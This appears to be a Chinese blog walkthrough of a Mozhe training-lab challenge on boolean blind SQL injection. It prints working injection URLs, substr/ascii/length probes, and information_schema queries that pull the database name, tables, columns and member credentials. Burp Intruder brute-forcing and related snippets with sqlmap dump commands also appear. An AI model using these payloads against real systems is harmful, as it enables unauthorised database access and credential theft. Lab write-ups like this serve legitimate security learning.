墨者 - SQL注入漏洞测试(布尔盲注)

最新推荐文章于 2024-05-12 07:41:20 发布
最新推荐文章于 2024-05-12 07:41:20 发布
阅读量1.4k 收藏
点赞数
分类专栏: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43803070/article/details/95091016
版权

**

一、报数据库名字

**

1.根据浮动的通告进度条,找到sql注入点。
内容不变,判断是数字型注入。

http://219.153.49.228:44199/new_list.php?id=1  and  1=1 --+

2.然后开始判断数据库名字的长度,1,2,3…内容空白。一直试,试到长度为10

http://219.153.49.228:44199/new_list.php?id=1%20%20and%20%20length(database())=10%20--+

3.开始猜测数据库名字:

219.153.49.228:44199/new_list.php?id=1 and  substr(database(),1,1)='s' --+

4.页面返回正常,在这里我们用burp工具进行爆破:
然后将其发送到Intercept模块,Intruder 是burp 套件的优势,他提供一组特别有用的功能。它可以自动实施各种定制攻击,包括资源枚举、数据提取、模糊测试等常见漏洞等。在各种有效的扫描工具中,它能够以最细化、最简单的方式访问它生产的请求与响应,允许组合利用个人智能与该工具的控制优点。
然后进入Intercept模块, b b b,美元符号围起来的就是需要爆破的值:
在这里插入图片描述
Sniper 这种攻击模式可以让我们选择的攻击位置注入一个单一的有效载荷。这需要的有效载荷选项,将它们插入到选定的位置,然后重复,直到它已测试所有的有效载荷选项。如果选择多个位置,它会只适用于测试,一次一个位置。我会告诉你如何使用这个测试在几秒钟之内的SQL 漏洞的迹象

Pitchfork 这种攻击模式允许你测试多种有效载荷,最大能够自定义8 个,基于攻击位置。这种攻击模式设置不同的有效载荷为每个位置逐一同时测试。

Cluster bomb 这种攻击模式使用多种有效载荷,并允许你测试每一个可能有效载荷在每个选择的攻击位置,这意味着接下来的测试,交换任何其他有效载荷。当你有不同需要注射的地方,它将会非常的方便。
在这里插入图片描述

在这里我们使用52个字母字典,进行爆破:
在这里插入图片描述

我们修改substr函数。在这里介绍一下:
substr()函数:
Substr()和substring()函数实现的功能是一样的,均为截取字符串。

string substring(string, start, length)

string substr(string, start, length)

参数描述同mid()函数,第一个参数为要处理的字符串,start为开始位置,length为截取的长度。

Sql用例:

(1) substr(DATABASE(),1,1)>’a’,查看数据库名第一位,substr(DATABASE(),2,1)查看数据库名第二位,依次查看各位字符。

(2) substr((SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE T table_schema=0xxxxxxx LIMIT 0,1),1,1)>’a’此处string参数可以为sql语句,可自行构造sql语句进行注入。
爆出第二个字段:
在这里插入图片描述
由此类推了,推出数据库的名字为stormgroup

**

二、爆出表名字

**

然后用new_list.php?id=1 and substr((select table_name from information_schema.tables where table_schema=‘stormgroup’ limit 0,1),1,1))=‘m’ --+,推出表名为member/notice

在这里插入图片描述

随后爆字段,new_list.php?id=1 and length((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1))=4 --+  推出字段名字为name,password,status

http://219.153.49.228:44199/new_list.php?id=1%20and%20%20substr((select%20%20column_name%20from%20information_schema.columns%20where%20table_name=%22member%22%20limit%200,1),1,1)%20=%27n%27%20--+

爆字段内容,/new_list.php?id=1 and length((select concat(name) from stormgroup.member limit 1,1))=5 --+ ,先判断内容长度

/new_list.php?id=1 and ascii(substr((select concat(name) from stormgroup.member limit 1,1),1,1))=109,测试其内容。

暮秋初九
关注
专栏目录
墨者学院-SQL注入漏洞测试布尔盲注
weixin_42939822的博客
03-20 4383
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
SQL手工注入漏洞测试(墨者学院)
最新发布
2301_80194086的博客
09-28 255
【代码】SQL手工注入漏洞测试(墨者学院)
墨者学院-SQL注入漏洞测试(布尔盲注)
Fisher
12-01 3959
拿到题目之后打开网站发现如下界面 本以为是输入框存在注入,结果发现并不是,而是下面一段小字,发现存在id=1的字样 手工注入: 1.判断注入点:
墨者学院——SQL注入漏洞测试(布尔盲注)
2303_76679642的博客
04-21 473
9.最后看字段值: sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -C (字段1,字段2,....) --dump --dbms mysql --batch。8.接着来查找表的字段:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 --columns --dbms mysql --batch。id=1 and 1=1,内容显示, 判断这个id的值类型是数字类型。
[墨者学院]SQL注入漏洞测试(布尔盲注)
m0_60945802的博客
03-22 4250
墨者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 828
墨者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为墨者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
墨者SQL注入漏洞测试(布尔盲注)
weixin_48621644的博客
09-15 990
小羊学安全 任重而道远~
SQL注入漏洞检测
Kali与编程
12-10 1526
SQL注入漏洞是一种常见的安全漏洞,渗透测试工程师需要掌握SQL注入漏洞的检测技术,以便在测试中及时发现和利用漏洞。常见的注入点包括GET参数、POST参数、Cookie、HTTP头部信息和用户名密码等,常见的注入方式包括基于错误的注入、基于联合查询的注入、基于布尔盲注的注入、基于时间盲注的注入和基于报错盲注的注入等。本文将从渗透测试工程师的角度,详细介绍SQL注入漏洞的检测基础,包括常见的注入点、注入方式、手工注入和自动化注入等。常见的SQL注入技术包括基于错误的注入、基于时间的注入、联合查询注入等。
SQL注入漏洞扫描检测
12-20
SQL注入检测的全套代码和论文介绍,C#,Web应用漏洞检测技术,是一种针对web应用的积极防御技术。该技术在应用尚未遭受攻击前,模拟黑客攻击的方式对目标系统进行各种探测,发现系统潜在的漏洞。由于web应用工作在HTTP应用层协议上,所以传统的防火墙、IDS等网络层防护设备不能对其进行保护,此时就需要web应用漏洞检测工具对系统的应用层进行保护,二者互补不足,共同保护web系统的安全。
墨者SQL注入漏洞测试(布尔盲注)题解
zr1213159840的博客
12-11 516
题目明说是布尔盲注,所以直接通过if函数进行注入即可 先猜测下数据库的长度 id=1 and 1=if(lenfth(database())=10,1,2) 能看出来,数据库的长度是10, 接着猜数据库的名称,直接添加substr截取一位一位猜,最后猜出来数据库的名称是stromgroup id=1 and 1=if(substr(database(),1,1)=‘s’,1,2) 接着猜库中包含的表有哪些,这个真的是手动搞了一个小时 id=1 and 1=if(substr((select table_n
SQL手工注入漏洞测试(Sql Server数据库)
技术超强的网络安全平台
11-28 1132
      还是先找到注入点,然后order by找出字段数:4 通过SQL语句中and 1=2 union select 1,2,3……,n联合查询,判断显示的是哪些字段,就是原本显示标题和内容时候的查询字段。此处返回的是错误页面,说明系统禁止使用union进行相关SQL查询,我们得使用其他方式进行手工SQL注入。 一、盲注 盲猜爆出表名   通过SQL语句中的and exists(select username from manage)查询,判断mana.
SQL注入漏洞测试(参数加密)
天天学安全专属博客
10-31 1173
SQL注入漏洞测试(参数加密)
墨者学院SQL注入漏洞测试(布尔盲注)
痴人说梦梦中人
11-13 471
1、 使用SQLmap,爆库,爆表,爆列,dump,md5解密获得密码登陆,获取key 2、 爆库 爆表 爆列 Dump Md5解密: 登陆获取key 3.修复建议 对sql语句进行以下处理: 1、 sql语句预编译 2、 检查变量数据类型和格式 3、 过滤特殊字符 4、 转译特殊符号 ...
sql注入之bool盲注
banliyaoguai的博客
05-12 628
二分法的思想很简单,因为整个数组是有序的,数组默认是递增的。首先选择数组中间的数字和需要查找的目标值比较如果相等最好,就可以直接返回答案了如果不相等如果中间的数字大于目标值,则中间数字向右的所有数字都大于目标值,全部排除如果中间的数字小于目标值,则中间数字向左的所有数字都小于目标值,全部排除。
Sql注入漏洞测试sqli-lab(1-50)
vsdfbhsdhsdfh的博客
09-30 2087
Sql注入漏洞测试sqli-lab
sql注入漏洞检测方法
xiuzhentianting的博客
09-04 2986
具有参数的地址: 可以用 啊D注入工具v2.32争抢版 或者 Domain4.3明小子 mssql的sysobject检测,可以加上过滤条件,比如 UNICODE(substring(xtype,1,1)) between 85 And 85 端口扫描用ScanPort1.2
sql注入漏洞和实验
2303_81447649的博客
02-29 1326
发现不管输入什么都不管用了这个时候布尔盲注就不适合我们了,布尔盲注对于页面的正确和错误有不同的回显,如果页面一直没有变化我们就可以用时间盲注其实时间盲注布尔盲注没有多大的差别,时间盲注多了if和sleep()函数。在将数据存入到了数据库中之后,开发者就认为数据是可信的,在下一次需要进行查询的时候,直接从数据库中取出了恶意数据,没有进行进一步的检验和处理,就会造成二次注入。SQL注入攻击的本质,服务器没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值